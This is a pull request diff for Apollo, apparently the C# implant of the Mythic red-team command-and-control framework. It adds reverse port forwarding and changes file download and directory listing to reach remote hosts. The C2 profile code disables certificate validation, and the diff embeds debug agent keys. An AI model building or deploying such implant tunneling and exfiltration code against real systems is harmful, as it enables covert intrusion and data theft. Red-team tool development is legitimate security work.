### PR TITLE
Port Forward Added to Apollo

### DIFF
--- a/Payload_Type/Apollo/agent_code/Apollo/Agent.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Agent.cs
@@ -391,7 +391,7 @@ namespace Apollo
             PortFwdDatagram[] rdatagrams = RPortFwdController.GetMythicMessagesFromQueue();
             SocksDatagram[] datagrams = SocksController.GetMythicMessagesFromQueue();
             List<ApolloTaskResponse> lResponses = new List<ApolloTaskResponse>(); // probably should be used to resend
-            if (responses.Length > 0 || datagrams.Length > 0)
+            if (responses.Length > 0 || datagrams.Length > 0 || rdatagrams.Length > 0)
             {
                 string guid = Guid.NewGuid().ToString();
                 while (retryCount < MAX_RETRIES)

--- a/Payload_Type/Apollo/agent_code/Apollo/Agent.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Agent.cs
@@ -321,7 +321,7 @@ namespace Apollo
                 DispatchSocksDatagrams(tasks.SocksDatagrams);
             }
 
-            if (tasks.PortFwdDg != null)
+            if (tasks.PortFwdDg != null && tasks.PortFwdDg.Length > 0)
             {
                 DispatchPortFwdDatagrams(tasks.PortFwdDg);
             }

--- a/Payload_Type/Apollo/agent_code/Apollo/Apollo.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Apollo.cs
@@ -53,19 +53,10 @@ namespace Apollo
 #else
 #error NO VALID EGRESS PROFILE SELECTED
 #endif
-            try
-            {
-                Agent implant = new Agent(profile);
-                implant.Start();
-            }
-            catch (Exception ex)
-            {
-                using (StreamWriter outputFile = new StreamWriter(Path.Combine("C:\\Temp\\", "WriteDebug.txt"), true))
-                {
-                    outputFile.WriteLine(ex.Message);
-                }
-            }
-        }
+            Agent implant = new Agent(profile);
+            implant.Start();
+            
+	    }
     }
 
 }

--- a/Payload_Type/Apollo/agent_code/Apollo/Apollo.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Apollo.cs
@@ -1,4 +1,4 @@
-﻿#define C2PROFILE_NAME_UPPER
+#define C2PROFILE_NAME_UPPER
 // supported profiles get undefined
 #if DEBUG
 #undef SMBSERVER
@@ -11,6 +11,7 @@
 using IPC;
 using Mythic.C2Profiles;
 using System;
+using System.IO;
 using System.IO.Pipes;
 using System.Linq;
 using System.Runtime.Serialization.Formatters.Binary;
@@ -22,7 +23,7 @@ namespace Apollo
     {
 
 #if DEBUG
-        public static string AgentUUID = "c6e47c3a-6315-4259-bb58-dcbf32a0ae46";
+        public static string AgentUUID = "8e896559-d770-415b-9635-661afc573053";
 #endif
 
         [STAThread]
@@ -38,7 +39,7 @@ namespace Apollo
             }
             else
             {
-                profile = new DefaultProfile(AgentUUID, "fERC3P0QP/l3nWddCtLlu7qCvUrRV6i1zwS3fq/WX2I=");
+                profile = new DefaultProfile(AgentUUID, "kZvIrF5VJ4mOlmm+tzDpFttLskTlRyC1hZoJzzFZKqs=");
             }
 #else
             DefaultProfile profile = new DefaultProfile();
@@ -52,9 +53,18 @@ namespace Apollo
 #else
 #error NO VALID EGRESS PROFILE SELECTED
 #endif
-
-            Agent implant = new Agent(profile);
-            implant.Start();
+            try
+            {
+                Agent implant = new Agent(profile);
+                implant.Start();
+            }
+            catch (Exception ex)
+            {
+                using (StreamWriter outputFile = new StreamWriter(Path.Combine("C:\\Temp\\", "WriteDebug.txt"), true))
+                {
+                    outputFile.WriteLine(ex.Message);
+                }
+            }
         }
     }
 

--- a/Payload_Type/Apollo/agent_code/Apollo/Apollo.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Apollo.cs
@@ -11,7 +11,6 @@
 using IPC;
 using Mythic.C2Profiles;
 using System;
-using System.IO;
 using System.IO.Pipes;
 using System.Linq;
 using System.Runtime.Serialization.Formatters.Binary;
@@ -23,7 +22,7 @@ namespace Apollo
     {
 
 #if DEBUG
-        public static string AgentUUID = "8e896559-d770-415b-9635-661afc573053";
+        public static string AgentUUID = "b1ba8044-eb2b-4767-b2da-17d3d8e69171";
 #endif
 
         [STAThread]
@@ -39,7 +38,7 @@ namespace Apollo
             }
             else
             {
-                profile = new DefaultProfile(AgentUUID, "kZvIrF5VJ4mOlmm+tzDpFttLskTlRyC1hZoJzzFZKqs=");
+                profile = new DefaultProfile(AgentUUID, "Ybza2pWN6Nh33lqwhGPqW1bT4ebzaBXG8sy2D86ZzeM=");
             }
 #else
             DefaultProfile profile = new DefaultProfile();
@@ -53,10 +52,10 @@ namespace Apollo
 #else
 #error NO VALID EGRESS PROFILE SELECTED
 #endif
-            Agent implant = new Agent(profile);
-            implant.Start();
-            
-	    }
+
+               Agent implant = new Agent(profile);
+               implant.Start();
+        }
     }
 
 }

--- a/Payload_Type/Apollo/agent_code/Apollo/Apollo.csproj
+++ b/Payload_Type/Apollo/agent_code/Apollo/Apollo.csproj
@@ -1,5 +1,5 @@
-﻿<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
   <PropertyGroup>
     <ResolveAssemblyReferenceIgnoreTargetFrameworkAttributeVersionMismatch>true</ResolveAssemblyReferenceIgnoreTargetFrameworkAttributeVersionMismatch>
@@ -206,6 +206,9 @@
     <Compile Include="Native\Structures.cs" />
     <Compile Include="Native\Win32Error.cs" />
     <Compile Include="Utils\WMIUtils.cs" />
+    <Compile Include="RPortFwdProxy\RPortFwdController.cs" />
+    <Compile Include="RPortFwdProxy\Classes\ProxyConnection.cs" />
+    <Compile Include="CommandModules\RPortFwd.cs" />
   </ItemGroup>
   <ItemGroup>
     <BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
@@ -226,6 +229,10 @@
   </ItemGroup>
   <ItemGroup>
     <Content Include="ApolloIcoJPEG.ico" />
+  </ItemGroup>
+  <ItemGroup>
+    <Folder Include="RPortFwdProxy\" />
+    <Folder Include="RPortFwdProxy\Classes\" />
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
   <ProjectExtensions />

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
@@ -1,4 +1,4 @@
-﻿#define C2PROFILE_NAME_UPPER
+#define C2PROFILE_NAME_UPPER
 
 #if DEBUG
 #undef HTTP
@@ -101,6 +101,7 @@ namespace Mythic.C2Profiles
             // Necessary to disable certificate validation
             ServicePointManager.ServerCertificateValidationCallback =
                 delegate { return true; };
+            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072 | SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
 #if USE_WEBCLIENT
             client = new WebClient();
             client.Proxy = null;
@@ -156,7 +157,6 @@ namespace Mythic.C2Profiles
                 try
                 {
 #if USE_HTTPWEB
-                    ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072 | SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
                     HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(Endpoint);
                     request.KeepAlive = false;
                     request.Method = "Post";
@@ -293,7 +293,7 @@ namespace Mythic.C2Profiles
             return "";
         }
 
-        override public string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] resps, SocksDatagram[] datagrams=null)
+        override public string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] resps, SocksDatagram[] datagrams=null,PortFwdDatagram[] rdatagrams=null)
         {
             try // Try block for HTTP requests
             {
@@ -343,7 +343,8 @@ namespace Mythic.C2Profiles
                     action = "post_response",
                     responses = resps,
                     delegates = new Dictionary<string, string>[] { },
-                    socks = datagrams
+                    socks = datagrams,
+                    rportfwds = rdatagrams
                 };
                 if (DelegateMessageRequestQueue.Count > 0)
                 {
@@ -472,6 +473,10 @@ namespace Mythic.C2Profiles
                 if (resp.socks != null)
                 {
                     response.SocksDatagrams = resp.socks;
+                }
+                if (resp.rportfwds != null)
+                {
+                    response.PortFwdDg = resp.rportfwds;
                 }
             }
             response.Delegates = finalDelegateMessageList.ToArray();

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
@@ -477,7 +477,8 @@ namespace Mythic.C2Profiles
                 if (resp.rportfwds != null)
                 {
                     response.PortFwdDg = new PortFwdDatagram[1];
-                    response.PortFwdDg[0].data = resp.rportfwds[0];
+                    response.PortFwdDg[0].data = JsonConvert.DeserializeObject<Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>>>(resp.rportfwds[0]);
+
                 }
             }
             response.Delegates = finalDelegateMessageList.ToArray();

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
@@ -477,7 +477,7 @@ namespace Mythic.C2Profiles
                 if (resp.rportfwds != null)
                 {
                     response.PortFwdDg = new PortFwdDatagram[1];
-                    response.PortFwdDg[0].data = resp.rportfwds;
+                    response.PortFwdDg[0].data = resp.rportfwds[0];
                 }
             }
             response.Delegates = finalDelegateMessageList.ToArray();

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
@@ -490,7 +490,7 @@ namespace Mythic.C2Profiles
                 if (resp.rportfwds != null)
                 {
                     response.PortFwdDg = new PortFwdDatagram[1];
-                    response.PortFwdDg[0].data = JsonConvert.DeserializeObject<Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>>>(resp.rportfwds[0]);
+                    response.PortFwdDg[0].data = JsonConvert.DeserializeObject<Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<int,String>>>>>>(resp.rportfwds[0]);
 
 		}
             }

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
@@ -476,7 +476,8 @@ namespace Mythic.C2Profiles
                 }
                 if (resp.rportfwds != null)
                 {
-                    response.PortFwdDg = resp.rportfwds;
+                    response.PortFwdDg = new PortFwdDatagram[1];
+                    response.PortFwdDg[0].data = resp.rportfwds;
                 }
             }
             response.Delegates = finalDelegateMessageList.ToArray();

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/DefaultProfile.cs
@@ -156,8 +156,8 @@ namespace Mythic.C2Profiles
             {
                 try
                 {
-#if USE_HTTPWEB
-                    HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(Endpoint);
+#if USE_HTTPWEB	    
+       		    HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(Endpoint);
                     request.KeepAlive = false;
                     request.Method = "Post";
                     request.ContentType = "text/plain";
@@ -168,11 +168,11 @@ namespace Mythic.C2Profiles
                     Stream reqStream = request.GetRequestStream();
                     reqStream.Write(reqPayload, 0, reqPayload.Length);
                     reqStream.Close();
-
+	            
                     WebResponse response = request.GetResponse();
                     sw.Stop();
                     DebugWriteLine($"Took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to get response.");
-                    using (StreamReader reader = new StreamReader(response.GetResponseStream()))
+		    using (StreamReader reader = new StreamReader(response.GetResponseStream()))
                     {
                         result = base.cryptor.Decrypt(reader.ReadToEnd());
                     }
@@ -233,7 +233,7 @@ namespace Mythic.C2Profiles
                 }
                 catch (Exception ex)
                 {
-                    DebugWriteLine($"Error sending message. Reason: {ex.Message}\n\tStackTrace:{ex.StackTrace}");
+	            DebugWriteLine($"Error sending message. Reason: {ex.Message}\n\tStackTrace:{ex.StackTrace}");
 #if USE_WEBCLIENT
                     egressMtx.ReleaseMutex();
 #endif
@@ -344,7 +344,7 @@ namespace Mythic.C2Profiles
                     responses = resps,
                     delegates = new Dictionary<string, string>[] { },
                     socks = datagrams,
-                    rportfwds = rdatagrams
+                    rportfwds = rdatagrams,
                 };
                 if (DelegateMessageRequestQueue.Count > 0)
                 {
@@ -414,6 +414,7 @@ namespace Mythic.C2Profiles
         /// <returns>CaramelTask with the next task to execute</returns>
         override public Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent)
         {
+	    
             Stopwatch sw = new Stopwatch();
             sw.Start();
             //DebugWriteLine("Attempting to send SOCKS datagrams...");
@@ -421,36 +422,48 @@ namespace Mythic.C2Profiles
             sw.Stop();
             DebugWriteLine($"SendSocksDatagrams took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run.");
             sw.Restart();
+	    
             //DebugWriteLine("Sent all SOCKS datagrams!");
             TaskQueue response = new TaskQueue();
             List<Task> finalTaskList = new List<Task>();
             List<DelegateMessage> finalDelegateMessageList = new List<DelegateMessage>();
-            CheckTaskingRequest req = new CheckTaskingRequest()
+            
+            
+	    CheckTaskingRequest req = new CheckTaskingRequest()
             {
                 action = "get_tasking",
                 tasking_size = -1
             };
+	    
+            
             if (DelegateMessageRequestQueue.Count > 0)
             {
+		                
                 DelegateMessageRequestMutex.WaitOne();
                 req.delegates = DelegateMessageRequestQueue.ToArray();
                 DelegateMessageRequestQueue.Clear();
                 DelegateMessageRequestMutex.ReleaseMutex();
             } else
             {
+		
                 req.delegates = new Dictionary<string, string>[] { };
             }
+	    
             // Could add delegate post messages
             string json = JsonConvert.SerializeObject(req);
-            string id = Guid.NewGuid().ToString();
+                       
+	    string id = Guid.NewGuid().ToString();
             if (Send(id, json))
             {
+	        
                 string returnMsg = (string)Inbox.GetMessage(id);
-                //JObject test = (JObject)JsonConvert.DeserializeObject(returnMsg);
+		//JObject test = (JObject)JsonConvert.DeserializeObject(returnMsg);
                 ////Dictionary<string, object>[] testDictTasks = test.Value<Dictionary<string, object>[]>("tasks");
                 //Task[] testTasks = test.Value<Task[]>("tasks");
-                Mythic.Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject<Mythic.Structs.CheckTaskingResponse>(returnMsg);
-                if (resp.tasks != null)
+		Mythic.Structs.CheckTaskingResponse resp = new Mythic.Structs.CheckTaskingResponse();
+		resp = JsonConvert.DeserializeObject<Mythic.Structs.CheckTaskingResponse>(returnMsg);
+		
+		if (resp.tasks != null)
                 {
                     foreach (Task task in resp.tasks)
                     {
@@ -479,14 +492,14 @@ namespace Mythic.C2Profiles
                     response.PortFwdDg = new PortFwdDatagram[1];
                     response.PortFwdDg[0].data = JsonConvert.DeserializeObject<Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>>>(resp.rportfwds[0]);
 
-                }
+		}
             }
-            response.Delegates = finalDelegateMessageList.ToArray();
-            response.Tasks = finalTaskList.ToArray();
-            sw.Stop();
+	    response.Delegates = finalDelegateMessageList.ToArray();
+	    response.Tasks = finalTaskList.ToArray();
+	    sw.Stop();
             DebugWriteLine($"Get tasking took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run.");
             //SCTask task = JsonConvert.DeserializeObject<SCTask>(Post(json));
-            return response;
+	    return response;
         }
 
 

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/SMBClientProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/SMBClientProfile.cs
@@ -77,7 +77,7 @@ namespace Mythic.C2Profiles
             throw new NotImplementedException();
         }
 
-        public override string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] taskresp, SocksDatagram[] datagrams = null)
+        public override string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] taskresp, SocksDatagram[] datagrams = null, PortFwdDatagram[] rdatagrams=null)
         {
             throw new NotImplementedException();
         }

--- a/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/SMBServerProfile.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/C2Profiles/SMBServerProfile.cs
@@ -192,7 +192,7 @@ namespace Mythic.C2Profiles
             return "";
         }
 
-        public override string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] taskresp, SocksDatagram[] datagrams = null)
+        public override string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] taskresp, SocksDatagram[] datagrams = null, PortFwdDatagram[] rdatagrams=null)
         {
             try // Try block for HTTP requests
             {

--- a/Payload_Type/Apollo/agent_code/Apollo/CommandModules/DirectoryList.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/CommandModules/DirectoryList.cs
@@ -1,4 +1,4 @@
-﻿#define COMMAND_NAME_UPPER
+#define COMMAND_NAME_UPPER
 
 #if DEBUG
 #undef LS
@@ -75,8 +75,11 @@ namespace Apollo.CommandModules
         internal static string FormatPath(FileBrowserParameters parameters)
         {
             string path = "";
+            string computerName = Environment.GetEnvironmentVariable("COMPUTERNAME");
+            if (string.IsNullOrEmpty(computerName))
+                computerName = "";
             if (!string.IsNullOrEmpty(parameters.host) &&
-                parameters.host != Environment.GetEnvironmentVariable("COMPUTERNAME") &&
+                parameters.host.ToLower() != computerName.ToLower() &&
                 parameters.host.ToLower() != "localhost" &&
                 parameters.host.ToLower() != "127.0.0.1" &&
                 !string.IsNullOrEmpty(parameters.path) &&
@@ -118,7 +121,23 @@ namespace Apollo.CommandModules
                 try
                 {
                     FileInfo finfo = new FileInfo(path);
-
+                    FileInformation mFileInfo = new FileInformation()
+                    {
+                        full_name = finfo.FullName,
+                        name = finfo.Name,
+                        directory = finfo.DirectoryName,
+                        creation_date = finfo.CreationTimeUtc.ToString(),
+                        modify_time = finfo.LastWriteTimeUtc.ToString(),
+                        access_time = finfo.LastAccessTimeUtc.ToString(),
+                        permissions = GetPermissions(finfo), // This isn't gonna be right.
+                        extended_attributes = finfo.Attributes.ToString(), // This isn't gonna be right.
+                        size = finfo.Length,
+                        is_file = true,
+                        owner = File.GetAccessControl(path).GetOwner(typeof(System.Security.Principal.NTAccount)).ToString(),
+                        group = "",
+                        hidden = ((finfo.Attributes & System.IO.FileAttributes.Hidden) == FileAttributes.Hidden)
+                    };
+                    fileListResults.Add(mFileInfo);
                     resp = new FileBrowserResponse()
                     {
                         host = parameters.host,

--- a/Payload_Type/Apollo/agent_code/Apollo/CommandModules/Download.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/CommandModules/Download.cs
@@ -23,6 +23,11 @@ namespace Apollo.CommandModules
 {
     public class Download
     {
+        public struct DownloadParameters
+        {
+            public string file;
+            public string host;
+        }
         /// <summary>
         /// Download a file to the remote Apfell server.
         /// </summary>
@@ -34,9 +39,38 @@ namespace Apollo.CommandModules
         public static void Execute(Job job, Agent implant)
         {
             Task task = job.Task;
-            string filepath = task.parameters;
-            string strReply;
-            bool uploadResponse;
+            DownloadParameters dlParams;
+            string filepath = "";
+            string host = "";
+            string computerName = "";
+            try
+            {
+                computerName = Environment.GetEnvironmentVariable("COMPUTERNAME");
+            } catch { }
+            try
+            {
+                dlParams = JsonConvert.DeserializeObject<DownloadParameters>(task.parameters);
+            } catch (Exception ex)
+            {
+                job.SetError($"Failed to deserialize ");
+                return;
+            }
+            host = dlParams.host;
+            if (host != "")
+            {
+                if (host.ToLower() != "localhost" && host != "127.0.0.1" && host != "." && host != "::::" && host.ToLower() != computerName.ToLower())
+                {
+                    filepath = $"\\\\{host}\\{dlParams.file}";
+                } else
+                {
+                    filepath = dlParams.file;
+                    host = computerName;
+                }
+            } else
+            {
+                filepath = dlParams.file;
+                host = computerName;
+            }
             try // Try block for file upload task
             {
                 // Get file info to determine file size
@@ -55,7 +89,8 @@ namespace Apollo.CommandModules
                 {
                     task_id = task.id,
                     total_chunks = total_chunks,
-                    full_path = fileInfo.FullName
+                    full_path = fileInfo.FullName,
+                    host = host
                 };
 
                 job.AddOutput(registrationMessage);

--- a/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
@@ -1,5 +1,12 @@
 #define COMMAND_NAME_UPPER
 
+#if DEBUG
+#undef RPORTFWD
+#define RPORTFWD
+#endif
+
+#if RPORTFWD
+
 using Apollo.Jobs;
 using Apollo.RPortFwdProxy;
 using Apollo.Tasks;
@@ -93,3 +100,5 @@ namespace Apollo.CommandModules
         }
     }
 }
+
+#endif

--- a/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
@@ -1,10 +1,5 @@
 #define COMMAND_NAME_UPPER
 
-#if DEBUG
-#undef RPORTFWD
-#define RPORTFWD
-#endif
-
 #if RPORTFWD
 
 using Apollo.Jobs;

--- a/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
@@ -7,6 +7,7 @@ using Apollo.RPortFwdProxy;
 using Apollo.Tasks;
 using Mythic.Structs;
 using System;
+using System.IO;
 using System.Collections.Generic;
 using System.Linq;
 using System.Text;
@@ -27,10 +28,8 @@ namespace Apollo.CommandModules
         public static void Execute(Job job, Agent agent)
         {
             Task task = job.Task;
-
             JObject json = (JObject)JsonConvert.DeserializeObject(task.parameters);
             string action = json.Value<string>("action");
-            //SocksParams socksParams = Newtonsoft.Json.JsonConvert.DeserializeObject<SocksParams>(job.Task.parameters);
             string port = "0";
             string rport = "0";
             string rip = "";
@@ -49,14 +48,13 @@ namespace Apollo.CommandModules
                         job.SetError("Parameters to start Port Forward not found");
                         return;
                     }
-                    if (!RPortFwdController.IsActive(port))
+                    if (RPortFwdController.IsActive(port))
                     {
                         job.SetError("Port Forward is already active in that port.");
                         return;
                     }
-
+                    
                     RPortFwdController.StartClientPort(port, rport, rip);
-
                     job.SetComplete($"Port Forward connection started.");
 
                     break;
@@ -80,8 +78,8 @@ namespace Apollo.CommandModules
                     }
                     break;
                 case "flush":
-                    //RPortFwdController.FlushClient();
-                    job.SetComplete("Port Forward flush not implemented yet.");
+                    RPortFwdController.FlushClient();
+                    job.SetComplete("Flushed All Conections.");
                     break;
                 case "list":
                     string list = RPortFwdController.ListPortForward();

--- a/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
@@ -49,7 +49,7 @@ namespace Apollo.CommandModules
                         job.SetError("Parameters to start Port Forward not found");
                         return;
                     }
-                    if (RPortFwdController.IsActive(port))
+                    if (!RPortFwdController.IsActive(port))
                     {
                         job.SetError("Port Forward is already active in that port.");
                         return;

--- a/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/CommandModules/RPortFwd.cs
@@ -1,0 +1,95 @@
+#define COMMAND_NAME_UPPER
+
+using Apollo.Jobs;
+using Apollo.RPortFwdProxy;
+using Apollo.Tasks;
+using Mythic.Structs;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using Newtonsoft.Json.Linq;
+using Newtonsoft.Json;
+
+namespace Apollo.CommandModules
+{
+    class RPortFwd
+    {
+        public struct RPortFwdParams
+        {
+            public string action;
+            public int port;
+            public int rport;
+            public string rip;
+        }
+        public static void Execute(Job job, Agent agent)
+        {
+            Task task = job.Task;
+
+            JObject json = (JObject)JsonConvert.DeserializeObject(task.parameters);
+            string action = json.Value<string>("action");
+            //SocksParams socksParams = Newtonsoft.Json.JsonConvert.DeserializeObject<SocksParams>(job.Task.parameters);
+            string port = "0";
+            string rport = "0";
+            string rip = "";
+
+            switch (action)
+            {
+                case "start":
+                    try
+                    {
+                        port = json.Value<string>("port");
+                        rport = json.Value<string>("rport");
+                        rip = json.Value<string>("rip");
+                    }
+                    catch (Exception e)
+                    {
+                        job.SetError("Parameters to start Port Forward not found");
+                        return;
+                    }
+                    if (RPortFwdController.IsActive(port))
+                    {
+                        job.SetError("Port Forward is already active in that port.");
+                        return;
+                    }
+
+                    RPortFwdController.StartClientPort(port, rport, rip);
+
+                    job.SetComplete($"Port Forward connection started.");
+
+                    break;
+                case "stop":
+                    try
+                    {
+                        port = json.Value<string>("port");
+                    }
+                    catch (Exception e)
+                    {
+                        job.SetError("Parameters to stop Port Forward not found");
+                        return;
+                    }
+                    if (RPortFwdController.StopClientPort(port))
+                    {
+                        job.SetComplete("Port Forward connection stopped.");
+                    }
+                    else
+                    {
+                        job.SetComplete("Could not stop Port Forward in that port.");
+                    }
+                    break;
+                case "flush":
+                    //RPortFwdController.FlushClient();
+                    job.SetComplete("Port Forward flush not implemented yet.");
+                    break;
+                case "list":
+                    string list = RPortFwdController.ListPortForward();
+                    job.SetComplete(list);
+                    break;
+                default:
+                    job.SetError("Invalid action.");
+                    break;
+            }
+
+        }
+    }
+}

--- a/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
@@ -1,4 +1,4 @@
-﻿using System.Diagnostics;
+using System.Diagnostics;
 using Apollo.CommandModules;
 using System.Collections.Generic;
 using System.Threading;
@@ -256,13 +256,18 @@ namespace Mythic
             public Dictionary<string, string>[] delegates;
             public string message_id;
             public object socks;
+            public object rportfwds;
 
-            public TaskResponse(string _action, Apollo.Tasks.ApolloTaskResponse[] _responses, Dictionary<string, string>[] _delegates, string _message_id, object _socks)
+            public TaskResponse(string _action, Apollo.Tasks.ApolloTaskResponse[] _responses, Dictionary<string, string>[] _delegates, string _message_id, object _socks, object _rportfwds)
             {
                 action = _action;
                 responses = _responses;
                 delegates = _delegates;
                 message_id = _message_id;
+                if (_rportfwds == null)
+                    rportfwds = null;
+                else
+                    rportfwds = _rportfwds;
                 if (_socks == null)
                     socks = null;
                 else if (_socks.GetType() != typeof(SocksStartInfo) && _socks.GetType() != typeof(SocksStopInfo) && _socks.GetType() != typeof(SocksDatagram[]))
@@ -301,6 +306,16 @@ namespace Mythic
             public string data;
         }
 
+        public struct PortFwdDatagram
+        {
+            public Dictionary<String,Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>>> data;
+        }
+
+        public struct PortSpecificDatagram
+        {
+            public Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>> data;
+        }
+
         internal struct FileBrowserParameters
         {
             public string host;
@@ -326,6 +341,7 @@ namespace Mythic
             public Dictionary<string, string>[] delegates;
             public string message_id;
             public SocksDatagram[] socks;
+            public PortFwdDatagram[] rportfwds;
             // public DelegateMessages[] delegateMessages;
         }
 
@@ -351,6 +367,7 @@ namespace Mythic
             public Task[] Tasks;
             public DelegateMessage[] Delegates;
             public SocksDatagram[] SocksDatagrams;
+            public PortFwdDatagram[] PortFwdDg;
         }
     }
 
@@ -383,7 +400,7 @@ namespace Mythic
             public Crypto.Crypto cryptor;
             public abstract string SendResponse(string id, Apollo.Tasks.ApolloTaskResponse taskresp);
 
-            public abstract string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] resps, SocksDatagram[] datagrams = null);
+            public abstract string SendResponses(string id, Apollo.Tasks.ApolloTaskResponse[] resps, SocksDatagram[] datagrams = null, PortFwdDatagram[] rdatagrams = null);
 
             public abstract bool Send(string id, string message);
 

--- a/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
@@ -308,12 +308,12 @@ namespace Mythic
 
         public struct PortFwdDatagram
         {
-            public Dictionary<String,Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>>> data;
+            public Dictionary<String,Dictionary<String,Dictionary<String,Dictionary<String,Dictionary<int,String>>>>> data;
         }
 
         public struct PortSpecificDatagram
         {
-            public Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>> data;
+            public Dictionary<String,Dictionary<String,Dictionary<String,Dictionary<int,String>>>> data;
         }
 
         internal struct FileBrowserParameters

--- a/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
@@ -341,7 +341,7 @@ namespace Mythic
             public Dictionary<string, string>[] delegates;
             public string message_id;
             public SocksDatagram[] socks;
-            public PortFwdDatagram[] rportfwds;
+            public Dictionary<String,Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>>>[] rportfwds;
             // public DelegateMessages[] delegateMessages;
         }
 

--- a/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/Mythic.cs
@@ -341,7 +341,7 @@ namespace Mythic
             public Dictionary<string, string>[] delegates;
             public string message_id;
             public SocksDatagram[] socks;
-            public Dictionary<String,Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>>>[] rportfwds;
+            public String[] rportfwds;
             // public DelegateMessages[] delegateMessages;
         }
 

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -94,6 +94,7 @@ namespace Apollo.RPortFwdProxy.Classes
         {
             foreach (KeyValuePair<string, Queue> entry in operatorMapQueue)
             {
+                operatorDispatchDatagram.Abort();
                 lock (operatorReadQueue)
                 {
                     operatorReadQueue[entry.Key].Abort();

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -1,0 +1,488 @@
+using Newtonsoft.Json;
+using System;
